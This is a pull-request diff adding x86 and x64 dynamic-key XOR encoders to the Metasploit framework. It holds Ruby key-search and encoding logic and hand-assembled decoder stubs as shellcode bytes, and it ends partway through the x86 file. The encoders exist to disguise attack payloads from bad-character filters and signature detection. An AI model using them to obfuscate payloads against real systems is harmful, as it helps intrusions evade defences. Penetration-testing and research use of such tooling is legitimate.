### PR TITLE
feat: add x86/xor_dynamic and x64/xor_dynamic encoders

### DIFF
--- a/lib/msf/core/encoder.rb
+++ b/lib/msf/core/encoder.rb
@@ -684,4 +684,5 @@ require 'msf/core/encoder/xor_additive_feedback'
 require 'msf/core/encoder/alphanum'
 require 'msf/core/encoder/nonalpha'
 require 'msf/core/encoder/nonupper'
+require 'msf/core/encoder/xor_dynamic'
 

--- a/lib/msf/core/encoder/xor_dynamic.rb
+++ b/lib/msf/core/encoder/xor_dynamic.rb
@@ -1,0 +1,157 @@
+# -*- coding: binary -*-
+require 'msf/core'
+
+class Msf::Encoder::XorDynamic < Msf::Encoder
+
+  def initialize(info)
+      super(info)
+  end
+
+  def minKeyLen
+    Integer(datastore['KEYMIN'] || 0)
+  end
+
+  def maxKeyLen
+    Integer(datastore['KEYMAX'] || 0)
+  end
+
+  def stub
+    nil
+  end
+
+  def stubKeyTerm
+    nil
+  end
+
+  def stubPayloadTerm
+    nil
+  end
+
+  def find_key(buf, badchars, keyChars)
+
+    keyFound = nil
+
+    bufLen = buf.length
+
+    # Search for a valid key
+    _minKeyLen = minKeyLen
+    if _minKeyLen < 1
+      _minKeyLen = Integer(buf.length / 100 * (0.2 + 0.05 * badchars.length))
+      if _minKeyLen < 1
+        _minKeyLen = 1
+      end
+    end
+
+    _maxKeyLen = maxKeyLen
+    if _maxKeyLen < 1
+      _maxKeyLen = buf.length
+    end
+
+    for keyLen in _minKeyLen.._maxKeyLen do
+      $stderr.print "\rKey size: #{keyLen}"
+      $stderr.flush
+
+      myKey = ""
+      for x in 0..keyLen - 1 do
+        keyChars.each_char do |j|
+          ok = true
+          i = 0
+          while i + x < bufLen do
+            if badchars[(buf[i + x].ord ^ j.ord).chr]
+              ok = false
+              break
+            end
+
+            i += keyLen
+          end
+
+          if ok
+            myKey << j.chr
+            break
+          end
+
+        end
+      end
+
+      if myKey.length == keyLen
+        keyFound = myKey
+        break
+      end
+    end
+
+    $stderr.print "\n"
+    $stderr.flush
+    return keyFound
+  end
+
+  def encode(buf, badchars = nil, state = nil, platform = nil)
+
+    # Set default badchars if empty
+    badchars = "\x00\x0a\x0d" if (badchars == nil or badchars == '')
+
+    # Check badchars in stub
+    if Rex::Text.badchar_index(stub.gsub(stubKeyTerm, "").gsub(stubPayloadTerm, ""), badchars)
+      raise EncodingError, "Bad character found in stub for the #{self.name} encoder.", caller
+    end
+
+    # Set allowed chars
+    keyChars = ""
+    for i in 1..255 do
+      if !badchars[i.chr]
+        keyChars << i.chr
+      end
+    end
+
+    # Find key
+    key = find_key(buf, badchars, keyChars)
+
+    if key == nil
+      raise NoKeyError, "A key could not be found for the #{self.name} encoder.", caller
+    end
+
+    # Search for key terminator
+    keyTerm = nil
+    keyChars.chars.shuffle.each do |i|
+      if !key[i]
+        keyTerm = i
+        break
+      end
+    end
+
+    if keyTerm == nil
+      raise EncodingError, "Key terminator could not be found for the #{self.name} encoder.", caller
+    end
+
+    # Encode paylod
+    pos = 0
+    encoded = ""
+    while pos < buf.length
+      encoded << (buf[pos].ord ^ key[pos % key.length].ord).chr
+      pos += 1
+    end
+
+    # Search for payload terminator
+    payloadTerm = nil
+    keyChars.chars.shuffle.each do |i|
+      break unless keyChars.chars.shuffle.each do |j|
+        if !encoded.index(i + j)
+          payloadTerm = i + j
+          break
+        end
+      end
+    end
+
+    if payloadTerm == nil
+      raise EncodingError, "Payload terminator could not be found for the #{self.name} encoder.", caller
+    end
+
+    finalPayload = stub.gsub(stubKeyTerm, keyTerm).gsub(stubPayloadTerm, payloadTerm) + key + keyTerm + encoded + payloadTerm
+
+    # Check badchars in finalPayload
+    if Rex::Text.badchar_index(finalPayload, badchars)
+      raise EncodingError, "Bad character found for the #{self.name} encoder.", caller
+    end
+
+    return finalPayload
+  end
+end

--- a/lib/msf/core/encoder/xor_dynamic.rb
+++ b/lib/msf/core/encoder/xor_dynamic.rb
@@ -7,11 +7,11 @@ class Msf::Encoder::XorDynamic < Msf::Encoder
       super(info)
   end
 
-  def minKeyLen
+  def min_key_len
     Integer(datastore['KEYMIN'] || 0)
   end
 
-  def maxKeyLen
+  def max_key_len
     Integer(datastore['KEYMAX'] || 0)
   end
 
@@ -19,11 +19,11 @@ class Msf::Encoder::XorDynamic < Msf::Encoder
     nil
   end
 
-  def stubKeyTerm
+  def stub_key_term
     nil
   end
 
-  def stubPayloadTerm
+  def stub_payload_term
     nil
   end
 
@@ -34,20 +34,20 @@ class Msf::Encoder::XorDynamic < Msf::Encoder
     bufLen = buf.length
 
     # Search for a valid key
-    _minKeyLen = minKeyLen
-    if _minKeyLen < 1
-      _minKeyLen = Integer(buf.length / 100 * (0.2 + 0.05 * badchars.length))
-      if _minKeyLen < 1
-        _minKeyLen = 1
+    _min_key_len = min_key_len
+    if _min_key_len < 1
+      _min_key_len = Integer(buf.length / 100 * (0.2 + 0.05 * badchars.length))
+      if _min_key_len < 1
+        _min_key_len = 1
       end
     end
 
-    _maxKeyLen = maxKeyLen
-    if _maxKeyLen < 1
-      _maxKeyLen = buf.length
+    _max_key_len = max_key_len
+    if _max_key_len < 1
+      _max_key_len = buf.length
     end
 
-    for keyLen in _minKeyLen.._maxKeyLen do
+    for keyLen in _min_key_len.._max_key_len do
       $stderr.print "\rKey size: #{keyLen}"
       $stderr.flush
 
@@ -90,7 +90,7 @@ class Msf::Encoder::XorDynamic < Msf::Encoder
     badchars = "\x00\x0a\x0d" if (badchars == nil or badchars == '')
 
     # Check badchars in stub
-    if Rex::Text.badchar_index(stub.gsub(stubKeyTerm, "").gsub(stubPayloadTerm, ""), badchars)
+    if Rex::Text.badchar_index(stub.gsub(stub_key_term, "").gsub(stub_payload_term, ""), badchars)
       raise EncodingError, "Bad character found in stub for the #{self.name} encoder.", caller
     end
 
@@ -145,7 +145,7 @@ class Msf::Encoder::XorDynamic < Msf::Encoder
       raise EncodingError, "Payload terminator could not be found for the #{self.name} encoder.", caller
     end
 
-    finalPayload = stub.gsub(stubKeyTerm, keyTerm).gsub(stubPayloadTerm, payloadTerm) + key + keyTerm + encoded + payloadTerm
+    finalPayload = stub.gsub(stub_key_term, keyTerm).gsub(stub_payload_term, payloadTerm) + key + keyTerm + encoded + payloadTerm
 
     # Check badchars in finalPayload
     if Rex::Text.badchar_index(finalPayload, badchars)

--- a/modules/encoders/x64/xor_dynamic.rb
+++ b/modules/encoders/x64/xor_dynamic.rb
@@ -16,28 +16,29 @@ class MetasploitModule < Msf::Encoder::XorDynamic
   end
 
   def stub
-    "\xeb\x34" +              #         jmp   _call
-    "\x59" +                  # _ret:   pop   rcx
-    "\x48\x89\xcb" +          #         mov   rbx,rcx
-    "\x48\x89\xde" +          #         mov   rsi,rbx
-    "\x80\x39\x41" +          # _lp1:   cmp   BYTE PTR [rcx], 'A'
-    "\x74\x05" +              #         je    _ok
-    "\x48\xff\xc1" +          #         inc   rcx
-    "\xeb\xf6" +              #         jmp   _lp1
-    "\x48\xff\xc1" +          # _ok:    inc   rcx
-    "\x48\x89\xcf" +          #         mov   rdi, rcx
-    "\x66\x81\x39\x42\x42" +  # _lp:    cmp   WORD PTR [rcx], 'BB'
-    "\x74\x14" +              #         je    _jmp
-    "\x8a\x03" +              #         mov   al, BYTE PTR [rbx]
-    "\x30\x01" +              #         xor   BYTE PTR [rcx], al
-    "\x48\xff\xc1" +          #         inc   rcx
-    "\x48\xff\xc3" +          #         inc   rbx
-    "\x80\x3b\x41" +          #         cmp   BYTE PTR [rbx], 'A'
-    "\x75\xea" +              #         jne   _lp
-    "\x48\x89\xf3" +          #         mov   rbx, rsi
-    "\xeb\xe5" +              #         jmp   _lp
-    "\xff\xe7" +              # _jmp:   jmp   rdi
-    "\xe8\xc7\xff\xff\xff"    # _call:  call  _ret
+    "\xeb\x27" +             #        jmp    _call
+    "\x5b" +                 # _ret:  pop    rbx
+    "\x53" +                 #        push   rbx
+    "\x5f" +                 #        pop    rdi
+    "\xb0\x41" +             #        mov    al, 'A'
+    "\xfc" +                 #        cld
+    "\xae" +                 # _lp1:  scas   al, BYTE PTR es:[rdi]
+    "\x75\xfd" +             #        jne    _lp1
+    "\x57" +                 #        push   rdi
+    "\x59" +                 #        pop    rcx
+    "\x53" +                 # _lp2:  push   rbx
+    "\x5e" +                 #        pop    rsi
+    "\x8a\x06" +             # _lp3:  mov    al, BYTE PTR [rsi]
+    "\x30\x07" +             #        xor    BYTE PTR [rdi], al
+    "\x48\xff\xc7" +         #        inc    rdi
+    "\x48\xff\xc6" +         #        inc    rsi
+    "\x66\x81\x3f\x42\x42" + #        cmp    WORD PTR [rdi], 'BB'
+    "\x74\x07" +             #        je     _jmp
+    "\x80\x3e\x41" +         #        cmp    BYTE PTR [rsi], 'A'
+    "\x75\xea" +             #        jne    _lp3
+    "\xeb\xe6" +             #        jmp    _lp2
+    "\xff\xe1" +             # _jmp:  jmp    rcx
+    "\xe8\xd4\xff\xff\xff"   # _call: call   _ret
   end
 
   def stub_key_term

--- a/modules/encoders/x64/xor_dynamic.rb
+++ b/modules/encoders/x64/xor_dynamic.rb
@@ -3,7 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-class MetasploitModule < Msf::Encoder
+class MetasploitModule < Msf::Encoder::XorDynamic
 
   def initialize
     super(
@@ -11,176 +11,40 @@ class MetasploitModule < Msf::Encoder
       'Description'      => 'An x64 XOR encoder with dynamic key size',
       'Author'           => [ 'lupman', 'phra' ],
       'Arch'             => ARCH_X64,
-      'License'          => MSF_LICENSE,
-      'EncoderType'      => Msf::Encoder::Type::Raw
+      'License'          => MSF_LICENSE
       )
   end
 
-  def minKeyLen
-    Integer(datastore['KEYMIN'] || 0)
-  end
-
-  def maxKeyLen
-    Integer(datastore['KEYMAX'] || 0)
-  end
-
   def stub
-    # jmp short _call
-    # _ret:
-    #   pop rcx
-    #   mov rbx, rcx
-    #   mov rsi, rbx
-    # lp1:
-    #   cmp byte [rcx], 'A'
-    #   je _ok
-    #   inc rcx
-    #   jmp lp1
-    # _ok:
-    #   inc rcx
-    #   mov rdi, rcx
-    # lp:
-    #   cmp word [rcx], 'BB'
-    #   jz _jmp
-    #   mov al, byte [rbx]
-    #   xor byte [rcx], al
-    #   inc rcx
-    #   inc rbx
-    #   cmp byte [rbx], 'A'
-    #   jnz lp
-    #   mov rbx, rsi
-    #   jmp lp
-    # _jmp:
-    #   jmp rdi
-    # _call:
-    #   call _ret
-    "\xeb\x34\x59\x48\x89\xcb\x48\x89\xde\x80\x39\x41\x74\x05\x48\xff\xc1\xeb\xf6\x48\xff\xc1\x48\x89\xcf\x66\x81\x39\x42\x42\x74\x14\x8a\x03\x30\x01\x48\xff\xc1\x48\xff\xc3\x80\x3b\x41\x75\xea\x48\x89\xf3\xeb\xe5\xff\xe7\xe8\xc7\xff\xff\xff"
+    "\xeb\x34" +              #         jmp   _call
+    "\x59" +                  # _ret:   pop   rcx
+    "\x48\x89\xcb" +          #         mov   rbx,rcx
+    "\x48\x89\xde" +          #         mov   rsi,rbx
+    "\x80\x39\x41" +          # _lp1:   cmp   BYTE PTR [rcx], 'A'
+    "\x74\x05" +              #         je    _ok
+    "\x48\xff\xc1" +          #         inc   rcx
+    "\xeb\xf6" +              #         jmp   _lp1
+    "\x48\xff\xc1" +          # _ok:    inc   rcx
+    "\x48\x89\xcf" +          #         mov   rdi, rcx
+    "\x66\x81\x39\x42\x42" +  # _lp:    cmp   WORD PTR [rcx], 'BB'
+    "\x74\x14" +              #         je    _jmp
+    "\x8a\x03" +              #         mov   al, BYTE PTR [rbx]
+    "\x30\x01" +              #         xor   BYTE PTR [rcx], al
+    "\x48\xff\xc1" +          #         inc   rcx
+    "\x48\xff\xc3" +          #         inc   rbx
+    "\x80\x3b\x41" +          #         cmp   BYTE PTR [rbx], 'A'
+    "\x75\xea" +              #         jne   _lp
+    "\x48\x89\xf3" +          #         mov   rbx, rsi
+    "\xeb\xe5" +              #         jmp   _lp
+    "\xff\xe7" +              # _jmp:   jmp   rdi
+    "\xe8\xc7\xff\xff\xff"    # _call:  call  _ret
   end
 
-  def find_key(buf, badchars, keyChars)
-
-    keyFound = nil
-
-    bufLen = buf.length
-
-    # Search for a valid key
-    _minKeyLen = minKeyLen
-    if _minKeyLen < 1
-      _minKeyLen = Integer(buf.length / 100 * (0.2 + 0.05 * badchars.length))
-      if _minKeyLen < 1
-        _minKeyLen = 1
-      end
-    end
-
-    _maxKeyLen = maxKeyLen
-    if _maxKeyLen < 1
-      _maxKeyLen = buf.length
-    end
-
-    for keyLen in _minKeyLen.._maxKeyLen do
-      $stderr.print "\rKey size: #{keyLen}"
-      $stderr.flush
-
-      myKey = ""
-      for x in 0..keyLen - 1 do
-        keyChars.each_char do |j|
-          ok = true
-          i = 0
-          while i + x < bufLen do
-            if badchars[(buf[i + x].ord ^ j.ord).chr]
-              ok = false
-              break
-            end
-
-            i += keyLen
-          end
-
-          if ok
-            myKey << j.chr
-            break
-          end
-
-        end
-      end
-
-      if myKey.length == keyLen
-        keyFound = myKey
-        break
-      end
-    end
-
-    $stderr.print "\n"
-    $stderr.flush
-    return keyFound
+  def stubKeyTerm
+    /A/
   end
 
-  def encode(buf, badchars = nil, state = nil, platform = nil)
-
-    # Set default badchars if empty
-    badchars = "\x00\x0a\x0d" if (badchars == nil or badchars == '')
-
-    # Check badchars in stub
-    if Rex::Text.badchar_index(stub.gsub(/A/, "").gsub(/BB/, ""), badchars)
-      raise EncodingError, "Bad character found in stub for the #{self.name} encoder.", caller
-    end
-
-    # Set allowed chars
-    keyChars = ""
-    for i in 1..255 do
-      if !badchars[i.chr]
-        keyChars << i.chr
-      end
-    end
-
-    # Find key
-    key = find_key(buf, badchars, keyChars)
-
-    if key == nil
-      raise NoKeyError, "A key could not be found for the #{self.name} encoder.", caller
-    end
-
-    # Search for key terminator
-    keyTerm = nil
-    keyChars.chars.shuffle.each do |i|
-      if !key[i]
-        keyTerm = i
-        break
-      end
-    end
-
-    if keyTerm == nil
-      raise EncodingError, "Key terminator could not be found for the #{self.name} encoder.", caller
-    end
-
-    # Encode paylod
-    pos = 0
-    encoded = ""
-    while pos < buf.length
-      encoded << (buf[pos].ord ^ key[pos % key.length].ord).chr
-      pos += 1
-    end
-
-    # Search for payload terminator
-    payloadTerm = nil
-    keyChars.chars.shuffle.each do |i|
-      break unless keyChars.chars.shuffle.each do |j|
-        if !encoded.index(i + j)
-          payloadTerm = i + j
-          break
-        end
-      end
-    end
-
-    if payloadTerm == nil
-      raise EncodingError, "Payload terminator could not be found for the #{self.name} encoder.", caller
-    end
-
-    finalPayload = stub.gsub(/A/, keyTerm).gsub(/BB/, payloadTerm) + key + keyTerm + encoded + payloadTerm
-
-    # Check badchars in finalPayload
-    if Rex::Text.badchar_index(finalPayload, badchars)
-     raise EncodingError, "Bad character found for the #{self.name} encoder.", caller
-    end
-
-    return finalPayload
+  def stubPayloadTerm
+    /BB/
   end
 end

--- a/modules/encoders/x64/xor_dynamic.rb
+++ b/modules/encoders/x64/xor_dynamic.rb
@@ -40,11 +40,11 @@ class MetasploitModule < Msf::Encoder::XorDynamic
     "\xe8\xc7\xff\xff\xff"    # _call:  call  _ret
   end
 
-  def stubKeyTerm
+  def stub_key_term
     /A/
   end
 
-  def stubPayloadTerm
+  def stub_payload_term
     /BB/
   end
 end

--- a/modules/encoders/x64/xor_dynamic.rb
+++ b/modules/encoders/x64/xor_dynamic.rb
@@ -1,0 +1,186 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Encoder
+
+  def initialize
+    super(
+      'Name'             => 'Dynamic key XOR Encoder',
+      'Description'      => 'An x64 XOR encoder with dynamic key size',
+      'Author'           => [ 'lupman', 'phra' ],
+      'Arch'             => ARCH_X64,
+      'License'          => MSF_LICENSE,
+      'EncoderType'      => Msf::Encoder::Type::Raw
+      )
+  end
+
+  def minKeyLen
+    Integer(datastore['KEYMIN'] || 0)
+  end
+
+  def maxKeyLen
+    Integer(datastore['KEYMAX'] || 0)
+  end
+
+  def stub
+    # jmp short _call
+    # _ret:
+    #   pop rcx
+    #   mov rbx, rcx
+    #   mov rsi, rbx
+    # lp1:
+    #   cmp byte [rcx], 'A'
+    #   je _ok
+    #   inc rcx
+    #   jmp lp1
+    # _ok:
+    #   inc rcx
+    #   mov rdi, rcx
+    # lp:
+    #   cmp word [rcx], 'BB'
+    #   jz _jmp
+    #   mov al, byte [rbx]
+    #   xor byte [rcx], al
+    #   inc rcx
+    #   inc rbx
+    #   cmp byte [rbx], 'A'
+    #   jnz lp
+    #   mov rbx, rsi
+    #   jmp lp
+    # _jmp:
+    #   jmp rdi
+    # _call:
+    #   call _ret
+    "\xeb\x34\x59\x48\x89\xcb\x48\x89\xde\x80\x39\x41\x74\x05\x48\xff\xc1\xeb\xf6\x48\xff\xc1\x48\x89\xcf\x66\x81\x39\x42\x42\x74\x14\x8a\x03\x30\x01\x48\xff\xc1\x48\xff\xc3\x80\x3b\x41\x75\xea\x48\x89\xf3\xeb\xe5\xff\xe7\xe8\xc7\xff\xff\xff"
+  end
+
+  def find_key(buf, badchars, keyChars)
+
+    keyFound = nil
+
+    bufLen = buf.length
+
+    # Search for a valid key
+    _minKeyLen = minKeyLen
+    if _minKeyLen < 1
+      _minKeyLen = Integer(buf.length / 100 * (0.2 + 0.05 * badchars.length))
+      if _minKeyLen < 1
+        _minKeyLen = 1
+      end
+    end
+
+    _maxKeyLen = maxKeyLen
+    if _maxKeyLen < 1
+      _maxKeyLen = buf.length
+    end
+
+    for keyLen in _minKeyLen.._maxKeyLen do
+      $stderr.print "\rKey size: #{keyLen}"
+      $stderr.flush
+
+      myKey = ""
+      for x in 0..keyLen - 1 do
+        keyChars.each_char do |j|
+          ok = true
+          i = 0
+          while i + x < bufLen do
+            if badchars[(buf[i + x].ord ^ j.ord).chr]
+              ok = false
+              break
+            end
+
+            i += keyLen
+          end
+
+          if ok
+            myKey << j.chr
+            break
+          end
+
+        end
+      end
+
+      if myKey.length == keyLen
+        keyFound = myKey
+        break
+      end
+    end
+
+    $stderr.print "\n"
+    $stderr.flush
+    return keyFound
+  end
+
+  def encode(buf, badchars = nil, state = nil, platform = nil)
+
+    # Set default badchars if empty
+    badchars = "\x00\x0a\x0d" if (badchars == nil or badchars == '')
+
+    # Check badchars in stub
+    if Rex::Text.badchar_index(stub.gsub(/A/, "").gsub(/BB/, ""), badchars)
+      raise EncodingError, "Bad character found in stub for the #{self.name} encoder.", caller
+    end
+
+    # Set allowed chars
+    keyChars = ""
+    for i in 1..255 do
+      if !badchars[i.chr]
+        keyChars << i.chr
+      end
+    end
+
+    # Find key
+    key = find_key(buf, badchars, keyChars)
+
+    if key == nil
+      raise NoKeyError, "A key could not be found for the #{self.name} encoder.", caller
+    end
+
+    # Search for key terminator
+    keyTerm = nil
+    keyChars.chars.shuffle.each do |i|
+      if !key[i]
+        keyTerm = i
+        break
+      end
+    end
+
+    if keyTerm == nil
+      raise EncodingError, "Key terminator could not be found for the #{self.name} encoder.", caller
+    end
+
+    # Encode paylod
+    pos = 0
+    encoded = ""
+    while pos < buf.length
+      encoded << (buf[pos].ord ^ key[pos % key.length].ord).chr
+      pos += 1
+    end
+
+    # Search for payload terminator
+    payloadTerm = nil
+    keyChars.chars.shuffle.each do |i|
+      break unless keyChars.chars.shuffle.each do |j|
+        if !encoded.index(i + j)
+          payloadTerm = i + j
+          break
+        end
+      end
+    end
+
+    if payloadTerm == nil
+      raise EncodingError, "Payload terminator could not be found for the #{self.name} encoder.", caller
+    end
+
+    finalPayload = stub.gsub(/A/, keyTerm).gsub(/BB/, payloadTerm) + key + keyTerm + encoded + payloadTerm
+
+    # Check badchars in finalPayload
+    if Rex::Text.badchar_index(finalPayload, badchars)
+     raise EncodingError, "Bad character found for the #{self.name} encoder.", caller
+    end
+
+    return finalPayload
+  end
+end

--- a/modules/encoders/x86/xor_dynamic.rb
+++ b/modules/encoders/x86/xor_dynamic.rb
@@ -3,7 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-class MetasploitModule < Msf::Encoder
+class MetasploitModule < Msf::Encoder::XorDynamic
 
   def initialize
     super(
@@ -11,176 +11,40 @@ class MetasploitModule < Msf::Encoder
       'Description'      => 'An x86 XOR encoder with dynamic key size',
       'Author'           => [ 'lupman', 'phra' ],
       'Arch'             => ARCH_X86,
-      'License'          => MSF_LICENSE,
-      'EncoderType'      => Msf::Encoder::Type::Raw
+      'License'          => MSF_LICENSE
       )
   end
 
-  def minKeyLen
-    Integer(datastore['KEYMIN'] || 0)
-  end
-
-  def maxKeyLen
-    Integer(datastore['KEYMAX'] || 0)
-  end
-
   def stub
-    # jmp short _call
-    # _ret:
-    #   pop ecx
-    #   mov ebx, ecx
-    #   mov esi, ebx
-    # lp1:
-    #   cmp byte [ecx], 'a'
-    #   je _ok
-    #   inc ecx
-    #   jmp lp1
-    # _ok:
-    #   inc ecx
-    #   mov edi, ecx
-    # lp:
-    #   cmp word [ecx], 'bb'
-    #   jz _jmp
-    #   mov al, byte [ebx]
-    #   xor byte [ecx], al
-    #   inc ecx
-    #   inc ebx
-    #   cmp byte [ebx], 'a'
-    #   jnz lp
-    #   mov ebx, esi
-    #   jmp lp
-    # _jmp:
-    #   jmp edi
-    # _call:
-    #   call _ret
-    "\xeb\x28\x59\x89\xcb\x89\xde\x80\x39\x61\x74\x03\x41\xeb\xf8\x41\x89\xcf\x66\x81\x39\x62\x62\x74\x0f\x8a\x03\x30\x01\x41\x43\x80\x3b\x61\x75\xee\x89\xf3\xeb\xea\xff\xe7\xe8\xd3\xff\xff\xff"
+    "\xeb\x28" +              #         jmp   _call
+    "\x59" +                  # _ret:   pop   ecx
+    "\x89\xcb" +              #         mov   ebx, ecx
+    "\x89\xde" +              #         mov   esi, ebx
+    "\x80\x39\x61" +          # _lp1:   cmp   BYTE PTR [ecx], 'a'
+    "\x74\x03" +              #         je    _ok
+    "\x41" +                  #         inc   ecx
+    "\xeb\xf8" +              #         jmp   _lp1
+    "\x41" +                  # _ok:    inc   ecx
+    "\x89\xcf" +              #         mov   edi,ecx
+    "\x66\x81\x39\x62\x62" +  # _lp:    cmp   WORD PTR [ecx], 'bb'
+    "\x74\x0f" +              #         je    _jmp
+    "\x8a\x03" +              #         mov   al,BYTE PTR [ebx]
+    "\x30\x01" +              #         xor   BYTE PTR [ecx], al
+    "\x41" +                  #         inc   ecx
+    "\x43" +                  #         inc   ebx
+    "\x80\x3b\x61" +          #         cmp   BYTE PTR [ebx], 'a'
+    "\x75\xee" +              #         jne   _lp
+    "\x89\xf3" +              #         mov   ebx, esi
+    "\xeb\xea" +              #         jmp   _lp
+    "\xff\xe7" +              # _jmp:   jmp   edi
+    "\xe8\xd3\xff\xff\xff"    # _call:  call  _ret
   end
 
-  def find_key(buf, badchars, keyChars)
-
-    keyFound = nil
-
-    bufLen = buf.length
-
-    # Search for a valid key
-    _minKeyLen = minKeyLen
-    if _minKeyLen < 1
-      _minKeyLen = Integer(buf.length / 100 * (0.2 + 0.05 * badchars.length))
-      if _minKeyLen < 1
-        _minKeyLen = 1
-      end
-    end
-
-    _maxKeyLen = maxKeyLen
-    if _maxKeyLen < 1
-      _maxKeyLen = buf.length
-    end
-
-    for keyLen in _minKeyLen.._maxKeyLen do
-      $stderr.print "\rKey size: #{keyLen}"
-      $stderr.flush
-
-      myKey = ""
-      for x in 0..keyLen - 1 do
-        keyChars.each_char do |j|
-          ok = true
-          i = 0
-          while i + x < bufLen do
-            if badchars[(buf[i + x].ord ^ j.ord).chr]
-              ok = false
-              break
-            end
-
-            i += keyLen
-          end
-
-          if ok
-            myKey << j.chr
-            break
-          end
-
-        end
-      end
-
-      if myKey.length == keyLen
-        keyFound = myKey
-        break
-      end
-    end
-
-    $stderr.print "\n"
-    $stderr.flush
-    return keyFound
+  def stubKeyTerm
+    /a/
   end
 
-  def encode(buf, badchars = nil, state = nil, platform = nil)
-
-    # Set default badchars if empty
-    badchars = "\x00\x0a\x0d" if (badchars == nil or badchars == '')
-
-    # Check badchars in stub
-    if Rex::Text.badchar_index(stub.gsub(/A/, "").gsub(/BB/, ""), badchars)
-      raise EncodingError, "Bad character found in stub for the #{self.name} encoder.", caller
-    end
-
-    # Set allowed chars
-    keyChars = ""
-    for i in 1..255 do
-      if !badchars[i.chr]
-        keyChars << i.chr
-      end
-    end
-
-    # Find key
-    key = find_key(buf, badchars, keyChars)
-
-    if key == nil
-      raise NoKeyError, "A key could not be found for the #{self.name} encoder.", caller
-    end
-
-    # Search for key terminator
-    keyTerm = nil
-    keyChars.chars.shuffle.each do |i|
-      if !key[i]
-        keyTerm = i
-        break
-      end
-    end
-
-    if keyTerm == nil
-      raise EncodingError, "Key terminator could not be found for the #{self.name} encoder.", caller
-    end
-
-    # Encode paylod
-    pos = 0
-    encoded = ""
-    while pos < buf.length
-      encoded << (buf[pos].ord ^ key[pos % key.length].ord).chr
-      pos += 1
-    end
-
-    # Search for payload terminator
-    payloadTerm = nil
-    keyChars.chars.shuffle.each do |i|
-      break unless keyChars.chars.shuffle.each do |j|
-        if !encoded.index(i + j)
-          payloadTerm = i + j
-          break
-        end
-      end
-    end
-
-    if payloadTerm == nil
-      raise EncodingError, "Payload terminator could not be found for the #{self.name} encoder.", caller
-    end
-
-    finalPayload = stub.gsub(/a/, keyTerm).gsub(/bb/, payloadTerm) + key + keyTerm + encoded + payloadTerm
-
-    # Check badchars in finalPayload
-    if Rex::Text.badchar_index(finalPayload, badchars)
-     raise EncodingError, "Bad character found for the #{self.name} encoder.", caller
-    end
-
-    return finalPayload
+  def stubPayloadTerm
+    /bb/
   end
 end

--- a/modules/encoders/x86/xor_dynamic.rb
+++ b/modules/encoders/x86/xor_dynamic.rb
@@ -16,35 +16,33 @@ class MetasploitModule < Msf::Encoder::XorDynamic
   end
 
   def stub
-    "\xeb\x28" +              #         jmp   _call
-    "\x59" +                  # _ret:   pop   ecx
-    "\x89\xcb" +              #         mov   ebx, ecx
-    "\x89\xde" +              #         mov   esi, ebx
-    "\x80\x39\x61" +          # _lp1:   cmp   BYTE PTR [ecx], 'a'
-    "\x74\x03" +              #         je    _ok
-    "\x41" +                  #         inc   ecx
-    "\xeb\xf8" +              #         jmp   _lp1
-    "\x41" +                  # _ok:    inc   ecx
-    "\x89\xcf" +              #         mov   edi,ecx
-    "\x66\x81\x39\x62\x62" +  # _lp:    cmp   WORD PTR [ecx], 'bb'
-    "\x74\x0f" +              #         je    _jmp
-    "\x8a\x03" +              #         mov   al,BYTE PTR [ebx]
-    "\x30\x01" +              #         xor   BYTE PTR [ecx], al
-    "\x41" +                  #         inc   ecx
-    "\x43" +                  #         inc   ebx
-    "\x80\x3b\x61" +          #         cmp   BYTE PTR [ebx], 'a'
-    "\x75\xee" +              #         jne   _lp
-    "\x89\xf3" +              #         mov   ebx, esi
-    "\xeb\xea" +              #         jmp   _lp
-    "\xff\xe7" +              # _jmp:   jmp   edi
-    "\xe8\xd3\xff\xff\xff"    # _call:  call  _ret
+    "\xeb\x23" +             #        jmp    _call
+    "\x5b" +                 # _ret:  pop    ebx
+    "\x89\xdf" +             #        mov    edi, ebx
+    "\xb0\x41" +             #        mov    al, 'A'
+    "\xfc" +                 #        cld
+    "\xae" +                 # _lp1:  scas   al, BYTE PTR es:[edi]
+    "\x75\xfd" +             #        jne    _lp1
+    "\x89\xf9" +             #        mov    ecx, edi
+    "\x89\xde" +             # _lp2:  mov    esi, ebx
+    "\x8a\x06" +             # _lp3:  mov    al, BYTE PTR [esi]
+    "\x30\x07" +             #        xor    BYTE PTR [edi], al
+    "\x47" +                 #        inc    edi
+    "\x66\x81\x3f\x42\x42" + #        cmp    WORD PTR [edi], 'BB'
+    "\x74\x08" +             #        je     _jmp
+    "\x46" +                 #        inc    esi
+    "\x80\x3e\x41" +         #        cmp    BYTE PTR [esi], 'A'
+    "\x75\xee" +             #        jne    _lp3
+    "\xeb\xea" +             #        jmp    _lp2
+    "\xff\xe1" +             # _jmp:  jmp    ecx
+    "\xe8\xd8\xff\xff\xff"   # _call: call   _ret
   end
 
   def stub_key_term
-    /a/
+    /A/
   end
 
   def stub_payload_term
-    /bb/
+    /BB/
   end
 end

--- a/modules/encoders/x86/xor_dynamic.rb
+++ b/modules/encoders/x86/xor_dynamic.rb
@@ -1,0 +1,186 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Encoder
+
+  def initialize
+    super(
+      'Name'             => 'Dynamic key XOR Encoder',
+      'Description'      => 'An x86 XOR encoder with dynamic key size',
+      'Author'           => [ 'lupman', 'phra' ],
+      'Arch'             => ARCH_X86,
+      'License'          => MSF_LICENSE,
+      'EncoderType'      => Msf::Encoder::Type::Raw
+      )
+  end
+
+  def minKeyLen
+    Integer(datastore['KEYMIN'] || 0)
+  end
+
+  def maxKeyLen
+    Integer(datastore['KEYMAX'] || 0)
+  end
+
+  def stub
+    # jmp short _call
+    # _ret:
+    #   pop ecx
+    #   mov ebx, ecx
+    #   mov esi, ebx
+    # lp1:
+    #   cmp byte [ecx], 'a'
+    #   je _ok
+    #   inc ecx
+    #   jmp lp1
+    # _ok:
+    #   inc ecx
+    #   mov edi, ecx
+    # lp:
+    #   cmp word [ecx], 'bb'
+    #   jz _jmp
+    #   mov al, byte [ebx]
+    #   xor byte [ecx], al
+    #   inc ecx
+    #   inc ebx
+    #   cmp byte [ebx], 'a'
+    #   jnz lp
+    #   mov ebx, esi
+    #   jmp lp
+    # _jmp:
+    #   jmp edi
+    # _call:
+    #   call _ret
